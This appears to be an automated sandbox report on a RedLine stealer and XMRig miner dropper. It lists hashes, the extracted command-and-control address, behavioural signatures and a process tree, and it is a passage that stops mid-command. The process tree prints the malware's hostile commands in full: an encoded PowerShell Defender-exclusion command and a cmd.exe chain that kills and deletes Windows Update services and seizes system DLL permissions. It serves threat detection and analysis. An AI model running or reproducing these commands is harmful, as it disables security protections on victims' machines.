Analysis
-
max time kernel
168s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
07-08-2022 12:12
Behavioral task
behavioral1
Sample
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Resource
win10v2004-20220721-en
General
-
Target
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
-
Size
128KB
-
MD5
a7661b5802ed9c34ca2244e90efc83ce
-
SHA1
94fc10dd134800e663dca7af716e1cea0687bd02
-
SHA256
847e1e62de8a0e2f7e2a2024f74131bfd9ce8c81ebed2ce53e83d11516487443
-
SHA512
e3f19fb7518ea481f050441a868c86b90287ca256a5342beb602bfea18ba951db17866519b3a2d7d65f18a1c20839336e14134dbf30f050128e8fa3bb3bd91eb
Malware Config
Extracted
redline
LogsDiller Cloud (Sup: @mr_golds)
193.233.193.14:8163
-
auth_value
56c6f7b9024c076f0a96931453da7e56
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
schtasks.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters schtasks.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security schtasks.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 schtasks.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 schtasks.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4696-130-0x0000000000B90000-0x0000000000BB0000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
11.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3132-259-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3132-261-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3132-263-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3132-265-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3132-267-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 2 IoCs
Processes:
11.exeupdater.exepid process 312 11.exe 2012 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2336 takeown.exe 1040 icacls.exe 1968 takeown.exe 3484 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
11.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2336 takeown.exe 1040 icacls.exe 1968 takeown.exe 3484 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\11.exe themida C:\Users\Admin\AppData\Local\Temp\11.exe themida behavioral2/memory/312-146-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/312-147-0x0000000000400000-0x0000000001066000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/2012-210-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/2012-211-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/2012-213-0x0000000000400000-0x0000000001066000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
updater.exe11.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 11.exe -
Drops file in System32 directory 6 IoCs
Processes:
powershell.execonhost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
11.exeupdater.exepid process 312 11.exe 2012 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 792 set thread context of 3132 792 conhost.exe explorer.exe -
Drops file in Program Files directory 5 IoCs
Processes:
conhost.exepowershell.exesetup.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys conhost.exe File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f9fa7abc-0d49-4de9-b1cd-f36835128bfb.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220807141424.pma setup.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4108 sc.exe 5076 sc.exe 5000 sc.exe 3928 sc.exe 372 sc.exe 2224 sc.exe 4852 sc.exe 3140 sc.exe 5092 sc.exe 4192 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEconhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4364 reg.exe 4168 reg.exe 3584 reg.exe 2188 reg.exe 2192 reg.exe 1472 reg.exe 3292 reg.exe 4364 reg.exe 2160 reg.exe 1776 reg.exe 4676 reg.exe 1860 reg.exe 4920 reg.exe 1612 reg.exe 2852 reg.exe 3840 reg.exe 4552 reg.exe 1052 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exepowershell.execonhost.exepowershell.exemsedge.exemsedge.exepowershell.EXEpowershell.exeidentity_helper.execonhost.exeexplorer.exepid process 4696 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe 1244 powershell.exe 1244 powershell.exe 5028 conhost.exe 4416 powershell.exe 4416 powershell.exe 3316 msedge.exe 3316 msedge.exe 5048 msedge.exe 5048 msedge.exe 3144 powershell.EXE 3144 powershell.EXE 3144 powershell.EXE 2064 powershell.exe 2064 powershell.exe 2064 powershell.exe 516 identity_helper.exe 516 identity_helper.exe 792 conhost.exe 792 conhost.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe 3132 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 644 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 5048 msedge.exe 5048 msedge.exe 5048 msedge.exe 5048 msedge.exe 5048 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 4696 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeDebugPrivilege 5028 conhost.exe Token: SeShutdownPrivilege 4928 powercfg.exe Token: SeCreatePagefilePrivilege 4928 powercfg.exe Token: SeShutdownPrivilege 4424 powercfg.exe Token: SeCreatePagefilePrivilege 4424 powercfg.exe Token: SeShutdownPrivilege 2952 powercfg.exe Token: SeCreatePagefilePrivilege 2952 powercfg.exe Token: SeShutdownPrivilege 1472 powercfg.exe Token: SeCreatePagefilePrivilege 1472 powercfg.exe Token: SeTakeOwnershipPrivilege 1968 takeown.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeIncreaseQuotaPrivilege 4416 powershell.exe Token: SeSecurityPrivilege 4416 powershell.exe Token: SeTakeOwnershipPrivilege 4416 powershell.exe Token: SeLoadDriverPrivilege 4416 powershell.exe Token: SeSystemProfilePrivilege 4416 powershell.exe Token: SeSystemtimePrivilege 4416 powershell.exe Token: SeProfSingleProcessPrivilege 4416 powershell.exe Token: SeIncBasePriorityPrivilege 4416 powershell.exe Token: SeCreatePagefilePrivilege 4416 powershell.exe Token: SeBackupPrivilege 4416 powershell.exe Token: SeRestorePrivilege 4416 powershell.exe Token: SeShutdownPrivilege 4416 powershell.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeSystemEnvironmentPrivilege 4416 powershell.exe Token: SeRemoteShutdownPrivilege 4416 powershell.exe Token: SeUndockPrivilege 4416 powershell.exe Token: SeManageVolumePrivilege 4416 powershell.exe Token: 33 4416 powershell.exe Token: 34 4416 powershell.exe Token: 35 4416 powershell.exe Token: 36 4416 powershell.exe Token: SeIncreaseQuotaPrivilege 4416 powershell.exe Token: SeSecurityPrivilege 4416 powershell.exe Token: SeTakeOwnershipPrivilege 4416 powershell.exe Token: SeLoadDriverPrivilege 4416 powershell.exe Token: SeSystemProfilePrivilege 4416 powershell.exe Token: SeSystemtimePrivilege 4416 powershell.exe Token: SeProfSingleProcessPrivilege 4416 powershell.exe Token: SeIncBasePriorityPrivilege 4416 powershell.exe Token: SeCreatePagefilePrivilege 4416 powershell.exe Token: SeBackupPrivilege 4416 powershell.exe Token: SeRestorePrivilege 4416 powershell.exe Token: SeShutdownPrivilege 4416 powershell.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeSystemEnvironmentPrivilege 4416 powershell.exe Token: SeRemoteShutdownPrivilege 4416 powershell.exe Token: SeUndockPrivilege 4416 powershell.exe Token: SeManageVolumePrivilege 4416 powershell.exe Token: 33 4416 powershell.exe Token: 34 4416 powershell.exe Token: 35 4416 powershell.exe Token: 36 4416 powershell.exe Token: SeIncreaseQuotaPrivilege 4416 powershell.exe Token: SeSecurityPrivilege 4416 powershell.exe Token: SeTakeOwnershipPrivilege 4416 powershell.exe Token: SeLoadDriverPrivilege 4416 powershell.exe Token: SeSystemProfilePrivilege 4416 powershell.exe Token: SeSystemtimePrivilege 4416 powershell.exe Token: SeProfSingleProcessPrivilege 4416 powershell.exe Token: SeIncBasePriorityPrivilege 4416 powershell.exe Token: SeCreatePagefilePrivilege 4416 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exepid process 5048 msedge.exe 5048 msedge.exe 5048 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe11.exemsedge.execonhost.execmd.execmd.exedescription pid process target process PID 4696 wrote to memory of 312 4696 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe 11.exe PID 4696 wrote to memory of 312 4696 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe 11.exe PID 312 wrote to memory of 5028 312 11.exe conhost.exe PID 312 wrote to memory of 5028 312 11.exe conhost.exe PID 312 wrote to memory of 5028 312 11.exe conhost.exe PID 4696 wrote to memory of 5048 4696 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe msedge.exe PID 4696 wrote to memory of 5048 4696 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe msedge.exe PID 5048 wrote to memory of 4276 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 4276 5048 msedge.exe msedge.exe PID 5028 wrote to memory of 1244 5028 conhost.exe powershell.exe PID 5028 wrote to memory of 1244 5028 conhost.exe powershell.exe PID 5028 wrote to memory of 4892 5028 conhost.exe cmd.exe PID 5028 wrote to memory of 4892 5028 conhost.exe cmd.exe PID 5028 wrote to memory of 4908 5028 conhost.exe cmd.exe PID 5028 wrote to memory of 4908 5028 conhost.exe cmd.exe PID 4892 wrote to memory of 5092 4892 cmd.exe sc.exe PID 4892 wrote to memory of 5092 4892 cmd.exe sc.exe PID 4908 wrote to memory of 4928 4908 cmd.exe powercfg.exe PID 4908 wrote to memory of 4928 4908 cmd.exe powercfg.exe PID 4892 wrote to memory of 4192 4892 cmd.exe sc.exe PID 4892 wrote to memory of 4192 4892 cmd.exe sc.exe PID 4908 wrote to memory of 4424 4908 cmd.exe powercfg.exe PID 4908 wrote to memory of 4424 4908 cmd.exe powercfg.exe PID 4892 wrote to memory of 372 4892 cmd.exe sc.exe PID 4892 wrote to memory of 372 4892 cmd.exe sc.exe PID 4908 wrote to memory of 2952 4908 cmd.exe powercfg.exe PID 4908 wrote to memory of 2952 4908 cmd.exe powercfg.exe PID 4908 wrote to memory of 1472 4908 cmd.exe powercfg.exe PID 4908 wrote to memory of 1472 4908 cmd.exe powercfg.exe PID 4892 wrote to memory of 3928 4892 cmd.exe schtasks.exe PID 4892 wrote to memory of 3928 4892 cmd.exe schtasks.exe PID 4892 wrote to memory of 5076 4892 cmd.exe sc.exe PID 4892 wrote to memory of 5076 4892 cmd.exe sc.exe PID 4892 wrote to memory of 1612 4892 cmd.exe reg.exe PID 4892 wrote to memory of 1612 4892 cmd.exe reg.exe PID 4892 wrote to memory of 3840 4892 cmd.exe schtasks.exe PID 4892 wrote to memory of 3840 4892 cmd.exe schtasks.exe PID 5028 wrote to memory of 4416 5028 conhost.exe powershell.exe PID 5028 wrote to memory of 4416 5028 conhost.exe powershell.exe PID 4892 wrote to memory of 3292 4892 cmd.exe schtasks.exe PID 4892 wrote to memory of 3292 4892 cmd.exe schtasks.exe PID 4892 wrote to memory of 2852 4892 cmd.exe reg.exe PID 4892 wrote to memory of 2852 4892 cmd.exe reg.exe PID 4892 wrote to memory of 4364 4892 cmd.exe reg.exe PID 4892 wrote to memory of 4364 4892 cmd.exe reg.exe PID 4892 wrote to memory of 1968 4892 cmd.exe takeown.exe PID 4892 wrote to memory of 1968 4892 cmd.exe takeown.exe PID 4892 wrote to memory of 3484 4892 cmd.exe icacls.exe PID 4892 wrote to memory of 3484 4892 cmd.exe icacls.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe PID 5048 wrote to memory of 400 5048 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe"C:\Users\Admin\AppData\Local\Temp\2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\11.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t 